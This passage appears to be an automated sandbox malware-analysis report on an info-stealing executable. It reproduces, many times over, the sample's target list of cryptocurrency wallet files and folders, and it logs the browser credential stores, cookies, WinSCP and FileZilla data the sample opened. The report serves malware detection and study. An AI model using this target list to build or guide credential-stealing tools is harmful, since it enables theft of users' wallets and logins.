Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonM`
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.r

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

